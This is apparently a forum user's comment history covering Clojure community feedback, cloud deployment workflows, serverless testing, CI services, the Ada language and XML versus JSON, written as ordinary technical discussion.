1. 6

    The main comment themes I found were:

    • Error messages: still a problem
    • Spec: promising, but how to adopt fully unclear
    • Docs: still bad, but getting a little better
    • Startup time: always been a problem, becoming more pressing with serverless computing
    • Marketing/adoption: Clojure still perceived as niche/unknown by non-technical folk
    • Language: some nice ideas for improvement
    • Language Development Process: not changing, still an issue
    • Community: mostly good, but elitist attitudes are a turnoff, and there is a growing perception CLJ is shrinking
    • Libraries: more guidance needed on how to put them together
    • Other targets: a little interest in targeting non JS/JVM targets
    • Typing: less than in previous years, perhaps people are finding spec meets their needs?
    • ClojureScript: improving fast, tooling still tricky, NPM integration still tricky
    • Tooling: still hard to put all the pieces together
    • Compliments: “Best. Language. Ever.”

    Lots of room for improvement here, but I still love working with Clojure and am thankful that I get to do so.

    1. 3

      I’m running on Google Cloud Platform, but there’s enough similarities to AWS that hopefully this is helpful.

      I use Packer to bake a golden VM image that includes monitoring, logging, e.t.c. based on the most recent Ubuntu 16.04 update. I rebuild the golden image roughly monthly unless there is a security issue to patch. Then when I release new versions of the app I build an app specific image based on the latest golden image. It copies in an Uberjar from Google Cloud Storage (built by Google Cloud Builder). All of the app images live in the same image family

      I then run a rolling update to replace the current instances in the managed instance group with the new instances.

      The whole infrastructure is managed with Terraform, but I only need to touch Terraform if I’m changing cluster configuration or other resources. Day to day updates don’t need to go through Terraform at all, although now that the GCP Terraform provider supports rolling updates, I may look at doing it with Terraform.

      It’s just me for everything, so I’m responsible for it all.

      1. 3

        I just backed this project on Kickstarter. If it can be made to work like it promises, it would be a huge productivity boost for me on several projects. Currently with Deps, I bake an image with Packer and Ansible for every new deployment (based on a golden image). That has been getting a bit slow, so I was looking at other deployment options. Having super fast Ansible builds would be great, and make that not as necessary.

        1. 2

          Hi Daniel, I keep forgetting to reply here – thanks so much for your support! For every neat complementary comment I’ve been receiving 5 complex questions elsewhere. I’ve just posted a short update, and although it is running a little behind, it looks like the campaign still has legs. I’m certainly here until the final hour. :) Thanks again!

        1. 3

          At work we’ve adopted ADR’s - Architecture Decision Records. These are similar to RFC’s but a little bit lighter weight. We generally use them for any architectural decision we make which is likely to affect more than one person, which took a while to understand, or will be impactful over a long time.

          The great thing about them is that they’re structured to be able to be written in a stream of consciousness, to articulate the context (this is usually the most important thing), the decision, and its impact.

          If we don’t have a decision immediately we can leave it open as a PR for discussion before finishing it.

          1. 5

            I’m really pleased with the quality of projects that were submitted to Clojurists Together, and my only regret is that we couldn’t pick more of them. A huge thanks to our awesome members, we couldn’t do it without y’all.

            1. 26

              https://hackerone.com/reports/293359#activity-2203160 via https://twitter.com/infosec_au/status/945048806290321408 seems to at least shed a bit more light on things. I don’t find this kind of behavior to be OK at all:

              ”Oh my God.

              Are you seriously the Program Manager for Uber’s Security Division, with a 2013 psych degree and zero relevant industry experience other than technical recruiting?

              LULZ”

              1. 6

                The real impact with this vulnerability is the lack of rate limiting and/or IP address blacklisting for multiple successive failed authentication attempts, both issues of which were not mentioned within your summary dismissal of the report. Further, without exhaustive entropy analysis of the PRNG that feeds your token generation process, hand waving about 128 bits is meaningless if there are any discernible patterns that can be picked up in the PRNG.

                Hrm. He really wants to be paid for this?

                1. 3

                  I mean, it’s a lot better than, say, promising a minimum of 500 for unlisted vulnerabilities and then repeatedly not paying it. Also, that’s not an unfair critique–if you’re a program manager in a field, I’d expect some relevant experience. Or, maybe, we should be more careful about handing out titles like program manager, project manager, product manager, etc. (a common issue outside of security!).

                  At the core of it, it seems like the fellow dutifully tried to get some low-hanging fruit and was rebuffed, multiple times. This was compounded when the issues were closed as duplicate or known or unimportant or whatever…it’s impossible to tell the difference from the outside between a good actor saying “okay this is not something we care about” and a bad actor just wanting to save 500 bucks/save face.

                  Like, the correct thing to have done would have been to say “Hey, thanks for reporting that, we’re not sure that that’s a priority concern right now but here’s some amount of money/free t-shirt/uber credits, please keep at it–trying looking .”

                  The fact that the company was happy to accept the work product but wouldn’t compensate the person for what sounded like hours and hours of work is a very bad showing.

                  1. 9

                    Also, that’s not an unfair critique–if you’re a program manager in a field, I’d expect some relevant experience.

                    No-one deserves to be talked to in that way, in any context, but especially not in a professional one.

                    Or, maybe, we should be more careful about handing out titles like program manager, project manager, product manager, etc. (a common issue outside of security!).

                    There is no evidence that the title was “handed out”, especially since we don’t even know what the job description is.

                    1. 3
                      1. open the hackerone thread
                      2. open her profile to find her name
                      3. look her up on linkedin

                      I don’t presume to know what her job entails or whether or not she’s qualified, but titles should reflect reality or they lose their value. She certainly has a lot of endorsements on linkedin, which often carry more value than formal education.

                      It’s “Program Manager, Security” btw.

                      1. 2

                        There is no evidence that the title was “handed out”, especially since we don’t even know what the job description is.

                        There’s no evidence that it wasn’t–the point I’m making is that, due to practices elsewhere in industry, that title doesn’t really mean anything concrete.

                  1. 11

                    Hey @loige, nice writeup! I’ve been aching to asks a few questions to someone ‘in the know’ for a while, so here goes:

                    How do serverless developers ensure their code performs to spec (local testing), handles anticipated load (stress testing) and degrades deterministically under adverse network conditions (Jepsen-style or chaos- testing)? How do you implement backpressure? Load shedding? What about logging? Configuration? Continuous Integration?

                    All instances of applications written in a serverless style that I’ve come across so far (admittedly not too many) seemed to offer a Faustian bargain: “hello world” is super easy, but when stuff breaks, your only recourse is $BIGCO support. Additionally, your business is now non-trivially coupled to the $BIGCO and at the mercy of their decisions.

                    Can anyone with production experience chime in on the above issues?

                    1. 8

                      Great questions!

                      How do serverless developers ensure their code performs to spec (local testing)

                      AWS e.g. provides a local implementation of Lambda for testing. Otherwise normal testing applies: abstract out business logic into testable units that don’t depend on the transport layer.

                      handles anticipated load (stress testing)

                      Staging environment.

                      and degrades deterministically under adverse network conditions (Jepsen-style or chaos- testing)?

                      Trust Amazon / Microsoft / Google. Exporting this problem to your provider is one of the major value adds of serverless architecture.

                      How do you implement backpressure? Load shedding?

                      Providers usually have features for this, like rate limiting for different events. But it’s not turtles all the way down, eventually your code will touch a real datastore that can overload, and you have to detect and propagate that condition same as any other architecture.

                      What about logging?

                      Also a provider value add.

                      Configuration?

                      Providers have environment variables or something spiritually similar.

                      Continuous Integration?

                      Same as local testing, but automated?

                      but when stuff breaks, your only recourse is $BIGCO support

                      If their underlying infrastructure breaks, yep. But every architecture has this problem, it just depends on who your provider is. When your PaaS provider breaks, when your IaaS provider breaks, when your colo provider breaks, when your datacenter breaks, when your electrical provider blacks out, when your fuel provider misses a delivery, when your fuel mines have an accident. The only difference is how big the provider is, and how much money its customers pay it to not break. Serverless is at the bottom of the money food chain, if you want less problems then you take on more responsibility and spend the money to do it better than the provider for your use case, or use more than one provider.

                      Additionally, your business is now non-trivially coupled to the $BIGCO and at the mercy of their decisions.

                      Double-edged sword. You’ve non-trivially coupled to $BIGCO because you want them to make a lot of architectural decisions for you. So again, do it yourself, or use more than one provider.

                      1. 4

                        And great answers, thank you ;)

                        Having skimmed the SAM Local doc, it looks like they took the same approach as they did with DynamoDB local. I think this alleviates a lot of the practical issues around integrated testing. DynamoDB Local is great, but it’s still impossible to toggle throttling errors and other adverse conditions to check how the system handles these, end-to-end.

                        The staging-env and CI solution seems to be a natural extension of server-full development, fair enough. For stress testing specifically, though, it’s great to have full access to the SUT, and to be able to diagnose which components break (and why) as the load increases. This approach goes contrary to the opaque nature of the serverless substrate. You only get the metrics AWS/Google/etc. can provide you. I presume dtrace and friends are not welcome residents.

                        f their underlying infrastructure breaks, yep. But every architecture has this problem, it just depends on who your provider is. When your PaaS provider breaks, when your IaaS provider breaks, when your colo provider breaks, when your datacenter breaks, (…)

                        Well, there’s something to be said for being able to abstract away the service provider and just assume that there are simply nodes in a network. I want to know the ways in which a distributed system can fail – actually recreating the failing state is one way to find out and understand how the system behaves and what kind of countermeasures can be taken.

                        if you want less problems then you take on more responsibility

                        This is something of a pet peeve of mine. Because people delegate so much trust to cloud providers, individual engineers building software on top of these clouds are held to a lower and lower standard. If there is a hiccup, they can always blame “AWS issues”[1]. Rank-and-file developers won’t get asked why their software was not designed to gracefully handle these elusive “issues”. I think the learned word for this is the deskilling of the workforce.

                        [1] The lack of transparency on the part of the cloud providers around minor issues doesn’t help.

                        1. 3

                          For stress testing specifically, though, it’s great to have full access to the SUT, and to be able to diagnose which components break (and why) as the load increases.

                          It is great, and if you need it enough you’ll pay for it. If you won’t pay for it, you don’t need it, you just want it. If you can’t pay for it, and actually do need it, then that’s not a new problem either. Plenty of businesses fail because they don’t have enough money to pay for what they need.

                          This is something of a pet peeve of mine. Because people delegate so much trust to cloud providers, individual engineers building software on top of these clouds are held to a lower and lower standard. If there is a hiccup, they can always blame “AWS issues”[1]. Rank-and-file developers won’t get asked why their software was not designed to gracefully handle these elusive “issues”

                          I just meant to say you don’t have access to your provider’s infrastructure. But building more resilient systems takes more time, more skill, or both. In other words, money. Probably you’re right to a certain extent, but a lot of the time the money just isn’t there to build out that kind of resiliency. Businesses invest in however much resiliency will make them the most money for the cost.

                          So when you see that happening, ask yourself “would the engineering cost required to prevent this hiccup provide more business value than spending the same amount of money elsewhere?”

                      2. 4

                        @pzel You’ve hit the nail on the head here. See this post on AWS Lambda Reserved Concurrency for some of the issues you still face with Serverless style applications.

                        The Serverless architecture style makes a ton of sense for a lot of applications, however there are lots of missing pieces operationally. Things like the Serverless framework fill in the gaps for some of these, but not all of them. In 5 years time I’m sure a lot of these problems will have been solved, and questions of best practices will have some good answers, but right now it is very early.

                        1. 1

                          I agree with @danielcompton on the fact that serverless is still a pretty new practice in the market and we are still lacking an ecosystem able to support all the possible use cases. Time will come and it will get better, but having spent the last 2 years building enterprise serverless applications, I have to say that the whole ecosystem is not so immature and it can be used already today with some extra effort. I believe in most of the cases the benefits (not having to worry too much on the underlying infrastructure, don’t pay for idle, higher focus on business logic, high availability and auto-scalability) overcome by a lot the extra effort needed to learn and use serverless today.

                        2. 3

                          Even though @peter already gave you some great answers, I will try to complement them with my personal experience/knowledge (I have used serverless on AWS for almost 2 years now building fairly complex enterprise apps).

                          How do serverless developers ensure their code performs to spec (local testing)

                          The way I do is a combination of the following practices:

                          • unit testing
                          • acceptance testing (with mocked services)
                          • local testing (manual, mostly using the serverless framework invoke local functionality, but pretty much equivalent to SAM). Not everything could be locally tested depending on which services you use.
                          • remote testing environment (to test things that are hard to test locally)
                          • CI pipeline with multiple environments (run automated and manual tests in QA before deploying to production)
                          • smoke testing

                          What about logging?

                          In AWS you can use cloudwatch very easily. You can also integrate third parties like loggly. I am sure other cloud providers will have their own facilities around logging.

                          Configuration?

                          In AWS you can use parameters storage to hold sensible variables and you can propagate them to your lambda functions using environment variables. In terms of infrastructure as code (which you can include in the broad definition of “configuration”) you can adopt tools like terraform or cloudformation (in AWS specifically, predefined choice by the serverless framework).

                          Continuous Integration?

                          I tried serverless successfully with both Jenkins and CircleCI, but I guess almost any CI tool will do it. You just need to configure your testing steps and your deployment strategy into a CI pipeline.

                          when stuff breaks, your only recourse is $BIGCO support

                          Sure. But it’s kind of proof that your hand-rolled solution will be more likely to break than the one provided by any major cloud provider. Also, those cloud providers very often provide refunds if you have outages given by the provider infrastructure (assuming you followed their best practices on high availability setups).

                          your business is now non-trivially coupled to the $BIGCO

                          This is my favourite as I have a very opinionated view on this matter. I simply believe it’s not possible to avoid vendor lock-in. Of course vendor lock-in comes in many shapes and forms and at different layers, but my point is that it’s fairly unpractical to come up with an architecture that is so generic that it’s not affected by any kind of vendor lock-in. When you are using a cloud provider and a methodology like serverless it’s totally true you have a very high vendor lock-in, as you will be using specific services (e.g. API Gateway, Lambda, DynamoDB, S3 in AWS) that are unique in that provider and equivalent services will have very different interfaces with other providers. But I believe the question should be: is it more convenient/practical to pay the risk of the vendor lock-in, rather than spending a decent amount of extra time and effort to come up with a more abstracted infrastructure/app that allows switching the cloud provider if needed? In my experience, I found out that it’s very rarely a good idea to over-abstract solutions only to reduce the vendor lock-in.

                          I hope this can add another perspective to the discussion and enrich it a little bit. Feel free to ask more questions if you think my answer wasn’t sufficient here :)

                          1. 6

                            This is my favourite as I have a very opinionated view on this matter. I simply believe it’s not possible to avoid vendor lock-in. Of course vendor lock-in comes in many shapes and forms and at different layers, but my point is that it’s fairly unpractical to come up with an architecture that is so generic that it’s not affected by any kind of vendor lock-in.

                            Really? I find it quite easy to avoid vendor lock-in - simple running open-source tools on a VPS or dedicated server almost completely eliminates it. Even if a tool you use is discontinued, you still can use it, and have the option of maintaining it yourself. That’s not at all the case with AWS Lambda/etc. Is there some form of vendor lock in I should be worried about here, or do you simply consider this an unpractical architecture?

                            When you are using a cloud provider and a methodology like serverless it’s totally true you have a very high vendor lock-in, as you will be using specific services (e.g. API Gateway, Lambda, DynamoDB, S3 in AWS) that are unique in that provider and equivalent services will have very different interfaces with other providers. But I believe the question should be: is it more convenient/practical to pay the risk of the vendor lock-in, rather than spending a decent amount of extra time and effort to come up with a more abstracted infrastructure/app that allows switching the cloud provider if needed? In my experience, I found out that it’s very rarely a good idea to over-abstract solutions only to reduce the vendor lock-in.

                            The thing about vendor lock-in is that there’s a quite low probability that you will pay an extremely high price (for example, the API/service you’re using being shut down). Even if it’s been amazing in all the cases you’ve used it in, it’s still entirely possible for the expected value of using these services to be negative, due to the possibility of vendor lock-in issues. Thus, I don’t buy that it’s worth the risk - you’re free to so your own risk/benefit calculations though :)

                            1. 1

                              I probably have to clarify that for me “vendor lock-in” is a very high level concept that includes every sort of “tech lock-in” (which would probably be a better buzz word!).

                              My view is that even if you use an open source tech and you host it yourself, you end up taking a lot of complex tech decisions from which is going to be difficult (and expensive!) to move away.

                              Have you ever tried to migrate from redis to memcache (or vice versa)? Even though the two systems are quite similar and a migration might seem trivial, in a complex infrastructure, moving from one system to the other is still going to be a fairly complex operation with a lot of implications (code changes, language-driver changes, different interface, data migration, provisioning changes, etc.).

                              Also, another thing I am very opinionated about is what’s valuable when developing a tech product (especially if in a startup context). I believe delivering value to the customers/stakeholders is the most important thing while building a product. Whatever abstraction makes easier for the team to focus on business value I think it deserves my attention. On that respect I found Serverless to be a very good abstraction, so I am happy to pay some tradeoffs in having less “tech-freedom” (I have to stick to the solutions given by my cloud provider) and higher vendor lock-in.

                            2. 2

                              I simply believe it’s not possible to avoid vendor lock-in.

                              Well, there is vendor lock-in and vendor lock-in… Ever heard of Oracle Forms?

                          1. 2

                            You can configure CircleCI v1 through the web interface, and CircleCI v2 is configured via .circleci/config.yml.

                            1. 1

                              Thanks!

                              It seems a bit more complicated, though. CircleCI 1.0 configuration docs state at the very beginning that:

                              CircleCI automatically infers settings from your code, so it’s possible you won’t need to add any custom configuration. If you do need to tweak settings, you can create a circle.yml in your project’s root directory and CircleCI will read it each time it runs a build.

                              It doesn’t state anything about being able to provide such configuration w/o putting it in the repo. And there aren’t many details about this inference either.

                              1. 1

                                I don’t like that you cannot create standalone account in CircleCI. You have to sign-up via GitHub, BitBucket or Google. Even if you sign-up via Google, you have to connect to GitHub or BitBucket if you want to start building anything.


                                GitHub

                                CircleCI by circleci wants to access your account

                                Personal user data
                                Email addresses (read-only)

                                This application will be able to read your private email addresses.

                                Repositories
                                Public and private

                                This application will be able to read and write all public and private repository data. This includes the following:

                                • Code
                                • Issues
                                • Pull requests
                                • Wikis
                                • Settings
                                • Webhooks and services
                                • Deploy keys
                                • Collaboration invites

                                BitBucket

                                CircleCI is requesting access to the following:

                                • Read your account information
                                • Read your team’s project settings and read repositories contained within your team’s projects
                                • Read your repositories and their pull requests
                                • Administer your repositories
                                • Read and modify your repositories
                                • Read your team membership information
                                • Read and modify your repositories’ webhooks
                              1. 4

                                Have you tried Ada? I never looked at it myself, but that article[1] posted today looks very interesting. And there seems to be a well supported web server with WS support[2]

                                [1] http://blog.adacore.com/theres-a-mini-rtos-in-my-language [2] https://docs.adacore.com/aws-docs/aws/

                                1. 4

                                  TBH I can’t believe Ada is still alive. I thought it is something that we did in Theory of Programming Languages course and called nothing other than obsolete systems use it. Would give it a shot for sure!

                                  1. 4

                                    This article trying to use it for audio applications will give you a nice taste of the language:

                                    http://www.electronicdesign.com/embedded-revolution/assessing-ada-language-audio-applications

                                    This Barnes book shows how it’s systematically designed for safety at every level:

                                    https://www.adacore.com/books/safe-and-secure-software

                                    Note: The AdaCore website has a section called Gems that gives tips on a lot of useful ways to apply Ada.

                                    Finally, if you do Ada, you get the option of using Design-by-Contract (built-in to 2012) and/or SPARK language. One gives you clear specifications of program behavior that take you right to source of errors when fuzzing or something. The other is a smaller variant of Ada that integrates into automated, theorem provers to try to prove your code free of common errors in all cases versus just ones you think of like with testing. Those errors include things like integer overflow or divide by zero. Here’s some resources on those:

                                    http://www.eiffel.com/developers/design_by_contract_in_detail.html

                                    https://en.wikipedia.org/wiki/SPARK_(programming_language)

                                    https://www.amazon.com/Building-High-Integrity-Applications-SPARK/dp/1107040736

                                    The book and even language was designed for people without a background in formal methods. I’ve gotten positive feedback from a few people on it. Also, I encouraged some people to try SPARK for safer, native methods in languages such as Go. It’s kludgier than things like Rust designed for that in mind but still works.

                                    1. 2

                                      I’ve taken a look around Ada and got quite confused around the ecosystem and which versions of the language are available for free vs commercial. Are you able to give an overview as to the different dialects/Versions/recommended starting points?

                                      1. 4

                                        The main compiler vendor for Ada is AdaCore - that’s the commercial compiler. There is an open source version that AdaCore helps to developed called GNAT and it’s part of the GCC toolchain. It’s licensed with a special GMGPL license or GPLv3 with a runtime exception - meaning you can use both for closed source software development (as long as you don’t modify the compiler that is).

                                        There is also GNAT AUX which was developed by John Marino as part of a project I was part of in the past

                                        1. 1

                                          Thanks for clearing up the unusual license.

                                        2. 2

                                          I hear there is or was some weird stuff involved in the licensing. I’m not sure exactly what’s going on there. I just know they have a GPL version of GNAT that seemed like it can be used with GPL’d programs:

                                          https://www.adacore.com/community

                                          Here’s more on that:

                                          https://en.wikipedia.org/wiki/GNAT

                                  1. 18

                                    This is something that the rest of the team and I have been working on for more than a year. I think open source sustainability is going to be one of the big issues the tech community needs to face in the next ten years, in all communities, but particularly in niche ones like Clojure. Ruby Together has a really good model, so we copied it and applied it to the Clojure community (with some tweaks). Happy to answer any questions people have.

                                    1. 17

                                      Thank you for putting this together–all of you. I’m signing up Jepsen as a corporate sponsor right now.

                                    1. 3

                                      I’m currently using Alice + Bob as known users in my tests. I use Eve as a user that is malicious and is probing security boundaries, instead of just submitting wrong data.

                                      1. 2

                                        This kind of attack isn’t possible (AFAIK) on Google Cloud, because you need to set a Metadata-Flavor header or it won’t respond with any data. https://cloud.google.com/compute/docs/storing-retrieving-metadata#querying. Obviously there’s lots of other things that can go wrong with reflected XSS, but defense in depth is always good. I suspect it might be well too late for AWS to switch to a method like this though.

                                        1. 4

                                          What are lobsters’ thoughts on XML by the way? As a younger person looking back in this age of JSON, it seems like it actually had a bunch of neat ideas, wrapped up in a terrible syntax and some excessive feature bloat. Is there any work being done on salvaging some of it, or it it kind of a lost a cause?

                                          1. 8

                                            Aside from the awful syntax, XML has terminal featuritis (and, as an immediate consequence, a bunch of useful features; they’re just mixed in with a bunch of less useful ones). Simpler formats are usually better. Personally, in the absence of other requirements, for human-readable data, I’d use JSON; for human-writeable, YAML (though it has its own featuritis issues); for human-unreadable (i.e., binary), protobuf, though there’s actually been a relative proliferation of these lately (others to consider: Cap’n Proto, Avro).

                                            At this point, I’d drop XML other than for backwards compatibility. There are enough widely-supported alternatives which hit a useful subset of its features that I don’t expect anyone to put a lot of effort into making a “better” XML.

                                            1. 1

                                              If JSON or YAML will suffice, then XML was probably a terrible tool for the job. But I haven’t found a good alternative to XMLNS yet

                                            2. 6

                                              There are some good ideas in the XML ecosystem, but IMO the problem with it is that it doesn’t map to most programming language data structures. JavaScript, PHP, Python, Perl, Ruby all essentially have the JSON data model – dynamically typed dicts, lists, strings, numbers, booleans. JSON is the lowest common denominator between them all.

                                              Between those 5 languages, that’s probably 95%+ web apps, so you can see why JSON is a better fit than XML for communicating structured data between processes (not to mention that one side of the wire is usually JavaScript).

                                              The syntax of XML isn’t terrible; it’s only terrible if you use it for the wrong thing. The syntax of JSON is terrible if you’re say writing HTML with it:

                                              { "tag": "p"
                                                "content": ["This is my paragraph with text in ", {"tag": "b", "content": "bold" }, "\n"  ]
                                              }
                                              

                                              That is a horrible syntax for a document, just like XML is a bad syntax for structured data. I think people tend to overthink this. Use XML when you need to annotate text with attributes; Use JSON when you have structured data.

                                              I haven’t used XML lately but I imagine it’s still good for book toolchains and so forth. I think there is a habit of overengineering those kinds of tools though. I use HTML a lot these days and it works well.

                                              Historically people DID try to abuse XML into the role of JSON, e.g. for database dumps (which JSON isn’t even great at.) But people learned a lesson I suppose. There is a tendency to try to make a particular technology “universal”, and apply it to domains where it doesn’t fit.

                                              1. 4

                                                I’ve commented here a bunch on the topic of self-describing data in general, either to explain my view that the real problem is not the data format, but rather the schema… or to plug my incomplete project Modern Data, which I conceived of in a manic episode, so I make no apology for its grand scope, but I’m not sure when if ever I’ll have time to finish it…

                                                The project will someday, maybe be a self-describing schema format for dependently typed object graphs. To be useful it needs not only the basic typechecker, serializers, and deserializers, but also tools like diff and structure editors… The idea is that you could write a Modern Data schema for any existing file format (regardless of whether it’s based on something like XML or JSON, or it’s a low-level format more like PNG), and then gain the full benefit of the tooling ecosystem.

                                                It’s the kind of thing that I think many people would use if it were mature, but it’s challenging to get people interested in building it before it is.

                                                Anyway, the real problem is schemas. :) Every major serialization format I’m aware of has had major controversy over whether and how to support schemas, including formats such as JSON which originally tried to exist without any such support - it’s important enough that people tend to invent schema formats if they aren’t provided. There’s often a desire to make the schema format itself be something not-fully-general which maps naturally onto the kinds of data people want to represent in the underlying format. This is motivated by valid and important concerns about tooling support, but it never seems to actually get to the point where it meets everyone’s needs…

                                                And, of course, most self-describing data formats are more-or-less trees. That means they can’t handle certain situations where performance is important; for that you need arbitrary graphs, often implemented through some sort of intra-file pointer.

                                                1. 1

                                                  This sounds super interesting, have you written about it more anywhere else?

                                                  1. 2

                                                    Kind of, but I’ve never put together a good write-up of the motivation. See https://github.com/IreneKnapp/modern-data, and also somebody I met here once started an effort to redo the documentation, over at https://github.com/tinyplasticgreyknight/modern-docs.

                                                2. 3

                                                  JSON and XML solve totally different problems. You can abuse one to do what the other does, but that way lies pain.

                                                  JSON is an encoding for some common data structures and types: map, list, string, number, boolean

                                                  XML has none of these, but is a way to graft different kinds of data together in a single document such that parsers can use the parts they understand, and ignore the parts they don’t. Namespaces are the “eXtensible” part.

                                                  1. 2

                                                    It’s a markup language and it’s not terrible at markup.

                                                  1. 2

                                                    Attempting to get my home network running with two WAN connections. Currently they’re running in failover mode quite happily, but I want to get the router wanging traffic down both connections as a matter of course.

                                                    Off to Kraków, Poland mid-week for a few days. Sightseeing mostly, which I’m looking forward to. Should probably dust off the camera before I go.

                                                    1. 2

                                                      Are you wanting to bond the two connections, or share the load between them? I did load sharing with a Ubiquiti Edge Router Lite which worked pretty well.

                                                      1. 1

                                                        I’m not a networking person (below layer 3 is mostly a mystery to me) but I need to setup something in this space soon; what does bonding do that load sharing doesn’t?

                                                        1. 2

                                                          Bonding let’s a single computer use the combined bandwidth of two connections, while sharing (probably not the right term) let’s multiple computers each use a single connection. Bonding requires something at the “other end” to combine and split sending and receiving traffic. It would be best to do it at your ISP but this is a business feature, but you can also do it via a VPN type service. The best option depends very much what your goals are for having multiple connections: redundancy, max speed for single conn, sending Netflix over a cheaper connection and your work traffic over the fast 4G connection (my scenario).

                                                          1. 1

                                                            Thanks :)

                                                            I have two 4g links (my ISP sells a reasonably good speed-capped 4g plan which includes ~70% of the data transfer I need), but I only run one at a time and switch them over when I’m near the data cap.

                                                            This works alright, but I’d prefer to have traffic balanced across both and get double the speed (and hopefully better reliability).

                                                            Sounds like my best bet is to:

                                                            • Fire up a VPN box somewhere close by ($3/month)
                                                            • Get a decent wifi router (a couple of hundred dollars), bond the links via the VPN, connect everything to that router

                                                            Unfortunately the modems I have are locked-down and insist on doing DHCP etc - I guess I’ll have to filter that out somehow on the new router…

                                                            1. 1

                                                              I’ve never used them, but http://speedify.com is one option. “vpn bonding” is a good search term to use. I looked at getting a Mushroom, but they were too expensive. I also saw https://github.com/zehome/MLVPN, but have no experience with it.

                                                    1. 2

                                                      Here’s a question for the ages: are there any actually-existing good hosted CI providers out there?

                                                      1. 7

                                                        Not if you need speed: http://bitemyapp.com/posts/2016-03-28-speeding-up-builds.html

                                                        I would honestly pay good money for reliable, tested deployment automation that stood things like CI up.

                                                        1. 1

                                                          Who’d you end up going with for the dedicated server / what are the specs on that machine like?

                                                          1. 2

                                                            Approximately this with NVMe RAID: https://www.ovh.com/us/dedicated-servers/infra/173eg1.xml

                                                            tbqh, most the time we saved on compilation was lost to the GHCJS build later on. I was very sad.

                                                        2. 5

                                                          We use buildkite at my company. One nice aspect is that we get an agent to run on /our/ “hardware” (we just use large vm instances). It works pretty well.

                                                          1. 3

                                                            Another vote for buildkite here - their security posture is markedly better and you have much more control over performance.

                                                            1. 2

                                                              It’s probably worth mentioning here that GitLab offers similar functionality with their GitLab CI offering. You can use their infrastructure or install runners (their equivalent of agents) on as many machines as you like. Disclaimer: I haven’t used either yet but attended a meetup event where somebody praised them highly and ditched their Atlassian stack for that single reason.

                                                              1. 1

                                                                Their website looks intriguing could you elaborate on their security posture? Is it just an artifact of the on-premise build agent, or is there more to it than that?

                                                            2. 5

                                                              If you happen to run on Heroku, Heroku-CI works quite well. You don’t wait in a queue—we just launch a new dyno for every CI run, which happens while you blink. It’s definitely not as full features as Circle, or even Travis, but it’s typically good enough.

                                                              1. 1

                                                                At $WORK we run some things on Heroku but we can’t or don’t want to for most things — it’s either too expensive or the workload isn’t really well-suited for it.

                                                              2. 4

                                                                What do you need? I like Travis, they also get vastly better when you actually use the paid offering and they offer on-premise should you actually need it.

                                                                1. 2

                                                                  I need builds to not take 25-30 minutes.

                                                                  Bloodhound averages 25 minutes right now on TravisCI and that’s after I did a lot of aggressive caching: https://travis-ci.org/bitemyapp/bloodhound/builds/286053172?utm_source=github_status&utm_medium=notification

                                                                  Gross.

                                                                  1. 2

                                                                    I was asking cmhamill.

                                                                    But, just to be clear: your builds take 8-14 minutes. What takes time for you is the low concurrency settings on travis public/free infrastructure. It’s a shared resource, you only get so many parallel builds. That’s precisely why I referred to their paid offering: travis is a vastly different beast when using the commercial infrastructure.

                                                                    I also recommend not running the full matrix for every pull request, but just the stuff that frequently catches errors.

                                                                    1. 3

                                                                      I was asking cmhamill.

                                                                      You were asking in a public forum. I didn’t ask you to rebut or debate my experiences with TravisCI. https://github.com/cmhamill their email is on their GitHub profile if you’d like to speak with them without anyone one else chiming in. I’m relating an objection that is tied to real time lost on my part and that of other maintainers. It is a persistent complaint of other people I work with in OSS. I’m glad TravisCI’s free offering exists but I am not under the illusion that the value they’re providing was brought into existence ex nihilo with zero value derived from OSS.

                                                                      It’s a shared resource, you only get so many parallel builds. That’s precisely why I referred to their paid offering: travis is a vastly different beast when using the commercial infrastructure.

                                                                      We use commercial TravisCI at work. It’s better than CircleCI or Travis’ public offering but still not close to running a CI service on a dedis (singular or plural).

                                                                      I had to aggressively cache (multiple gigabytes) the build for Bloodhound before it stopped timing out. I’m glad their caching layer can tolerate something that fat but I wish it wasn’t necessary just to keep my builds working period.

                                                                      That combined with how unresponsive TravisCI has been in general leaves a sour taste. If there was a better open source CI option than something like DroneCI I’d probably have rented a dedi for the projects I work on already.

                                                                      1. 5

                                                                        You were asking in a public forum. I didn’t ask you to rebut or debate my experiences with TravisCI.

                                                                        You posted in a public forum and received some valid feedback based on the little context of your post ;)

                                                                    2. 1

                                                                      How long does it take on your local machine as a point of comparison?

                                                                      1. 2

                                                                        https://mail.haskell.org/pipermail/ghc-devs/2017-May/014200.html

                                                                        That’s just build, doesn’t include test suite, but the tests are a couple more minutes.

                                                                        1. 1

                                                                          Hm, that’s roughly the time your travis needs, too?

                                                                          https://travis-ci.org/bitemyapp/bloodhound/jobs/286053181#L539 -> 120.87s seconds

                                                                          1. 0

                                                                            Nope, the mailing list numbers do not include --fast and that makes a huge difference.

                                                                            You are off your rocker if you think the EC2 machines Travis uses are going to get close to what my workstation can do.

                                                                            1. 2

                                                                              Would you rather pay for a licensed software distribution that you drop in a fast dedicated computer you’ve bought and it turns that computer into a node in a CI cluster that can be used like Travis?

                                                                              Would you rather pay for a service just like Travis but more expensive and running on latest-and-greatest CPUs and such?

                                                                              1. 3

                                                                                Would you rather pay for a licensed software distribution that you drop in a fast dedicated computer you’ve bought and it turns that computer into a node in a CI cluster that can be used like Travis?

                                                                                If it actually worked well and I could test it before committing to a purchase, probably yes I would prefer that to losing control of my hardware or committing to a SAAS treadmill but businesses loooooooove recurring revenue and I can’t blame them.

                                                                                Would you rather pay for a service just like Travis but more expensive and running on latest-and-greatest CPUs and such?

                                                                                That seems like a more likely stop-gap as nobody seems to want to sell software OTS anymore. Note: it’s not really just CPUs, it’s tenancy. I’d rather pay SAAS service premium + actual-cost-of-leasing-hardware and get fast builds than the “maybe pay us extra, maybe get faster builds” games that most CI services play. Tell me what hardware I’m actually running on and with what tenancy so I don’t waste my time.

                                                                    3. 1

                                                                      Has anyone done this kind of dependency scan on Travis that this guy did on CircleCI? I suspect you will see much the same.

                                                                      Travis does have one clear advantage here in that it’s OSS so you can SEE its dependencies and make your own decisions. See my note about CircleCI needing to be better about communication above.

                                                                      1. 3

                                                                        Well… “scan”. They posted a screenshot of their network debugger tab :).

                                                                        Travis (.org) uses Pusher, but not their tracking scripts. It integrates Google Analytics and as such, communicates with it. ga.js is loaded from google.

                                                                        The page connects to:

                                                                        • api.travis-ci.org
                                                                        • cdn.travis-ci.org (which ends up being fast.ly)
                                                                        • gravatar.com (loading avatar images)
                                                                        • statuspage.io (loading some status information as JSON)
                                                                        • fonts.googleapis.com (loading the used fonts)
                                                                        • ws.pusherapp.com

                                                                        All in all, it is considerably less messy then circle-ci’s frontend.

